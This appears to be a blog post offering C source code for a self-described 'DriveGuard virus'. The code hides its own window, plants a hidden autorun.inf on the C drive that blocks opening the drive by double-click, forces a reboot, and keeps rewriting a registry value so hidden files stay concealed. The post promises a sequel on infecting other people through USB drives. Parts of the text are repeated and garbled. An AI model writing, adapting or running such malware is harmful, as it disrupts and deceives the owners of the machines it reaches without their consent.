In its presence you cannot open the drive with double click.I have written it to guard only “C” drive modify it to guard any drive.It will hide itself its window will not be visible and on its execution will restart the system.After the system boots you will not be able to double click and open the drive.
Solution:
Find and delete the autorun.inf file(will b hidden)in “c” drive and restart the system.In next post will tell how to run the virus when some one double clicks the USB infecting their system:-)
Solution:
Find and delete the autorun.inf file(will b hidden)in “c” drive and restart the system.In next post will tell how to run the virus when some one double clicks the USB infecting their system:-)
/*Simple DriveGuard virus in "C" Coded by sham*/ /*Solution:To remove de virus just delete the "autorun.inf" file it will be in hidden mode*/ #include#include #include int main() { FILE *fp; HWND hwnd = GetForegroundWindow(); HKEY hKey; DWORD val =2; ShowWindow(hwnd,SW_HIDE);//Hide its own console window fp=fopen("c:\autorun.inf","w"); fprintf(fp,"[autorun]n"); fprintf( fp,"open notepad.exe"); fprintf( fp,"n"); fprintf(fp,"shell\virus=I am a virus!"); fprintf( fp,"n"); fprintf(fp,"shell\virus\command=notepad.exe"); fprintf( fp,"n"); fprintf(fp,"shell=virus"); fclose(fp); system("attrib +H c:\autorun.inf");//To be be in hidden mode system("shutdown -r -t 10");// restart the system after 10 seconds while(1) { sleep(50); RegOpenKeyEx(HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", 0,KEY_ALL_ACCESS,&hKey); RegSetValueEx(hKey,"Hidden",0,REG_DWORD,(DWORD)&val, sizeof(val)); } getch(); return 0; }
No comments:
Post a Comment